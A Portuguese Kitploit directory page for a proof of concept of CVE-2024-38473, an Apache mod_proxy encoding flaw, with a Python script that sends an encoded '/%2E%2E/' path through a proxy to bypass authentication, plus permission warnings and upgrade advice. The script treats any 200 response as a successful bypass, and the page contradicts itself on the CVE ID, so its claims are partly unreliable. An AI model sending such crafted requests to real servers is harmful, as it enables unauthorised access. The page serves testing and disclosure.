Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-38473 — Prova de conceito que demonstra uma falha de codificação no mod_proxy do Apache HTTP Server que pode contornar a autenticação por meio de URLs codificadas elaboradas. | Kitploit
Ferramentas/GitHubGitHub/abdurahmon3236/cve-2024-38473
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

Prova de conceito que demonstra uma falha de codificação no mod_proxy do Apache HTTP Server que pode contornar a autenticação por meio de URLs codificadas elaboradas.

Ver Repositório
324há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito (PoC) para Problema de Codificação no mod_proxy no Apache HTTP Server

Este repositório contém scripts de Prova de Conceito (PoC) para demonstrar um problema de codificação no módulo mod_proxy do Apache HTTP Server versões 2.4.59 e anteriores. Esta vulnerabilidade permite que URLs de requisição com codificação incorreta sejam enviadas para serviços backend, potencialmente contornando a autenticação por meio de requisições criadas.

Índice

  • Descrição da Vulnerabilidade
  • Configuração e Uso
  • Considerações Importantes
  • Mitigação

Descrição da Vulnerabilidade

CVE-ID: (Pendente)

Visão Geral: Um problema de codificação no módulo mod_proxy do Apache HTTP Server versões 2.4.59 e anteriores permite que URLs de requisição com codificação incorreta sejam enviadas para serviços backend. Isso pode potencialmente contornar mecanismos de autenticação por meio de requisições criadas. Recomenda-se que os usuários atualizem para a versão 2.4.60, que corrige este problema.

Versões Afetadas:

  • Apache HTTP Server 2.4.59 e anteriores

Versão Corrigida:

  • Apache HTTP Server 2.4.60

Configuração e Uso

Pré-requisitos

  • Python 3.x
  • Biblioteca requests (pip install requests)

Demonstração da Vulnerabilidade

  1. Identifique o Serviço Backend:

    • Suponha que o serviço backend está localizado em http://backend-service.example.com.
  2. Crie uma Requisição Maliciosa:

    • A requisição maliciosa usará codificação incorreta para contornar a autenticação.
  3. Execute o Script PoC:

    • Salve o seguinte script como mod_proxy_poc.py e execute-o.

Script PoC

Aqui está um script Python que demonstra a vulnerabilidade:

root@kitploit:~
import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication

# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))

if __name__ == "__main__":
    send_malicious_request()

Explicação

  1. Configuração:

    • proxy_url: A URL do servidor proxy.
    • backend_service_path: O caminho para o recurso protegido no serviço backend.
    • malicious_path: O caminho codificado incorretamente para contornar a autenticação.
  2. send_malicious_request:

    • Constrói uma URL maliciosa com o caminho codificado incorretamente.
    • Envia uma requisição GET para o servidor proxy com a URL maliciosa.
    • Imprime os detalhes da resposta para verificar se a autenticação foi contornada.

Considerações Importantes

  • Permissões: Certifique-se de ter permissão explícita para testar esta vulnerabilidade no sistema alvo. O acesso não autorizado é ilegal e antiético.
  • Ambiente de Teste: Realize este teste em um ambiente controlado para evitar impactar sistemas de produção.

Mitigação

Para mitigar esta vulnerabilidade, atualize para o Apache HTTP Server versão 2.4.60, que corrige o problema de codificação no módulo mod_proxy.

  • Instruções de Atualização:
    • Siga a documentação oficial do Apache HTTP Server para baixar e instalar a versão mais recente.

Mantendo seu software atualizado e seguindo as melhores práticas de segurança, você pode prevenir vulnerabilidades como este problema de codificação no módulo mod_proxy.

Baixar ferramenta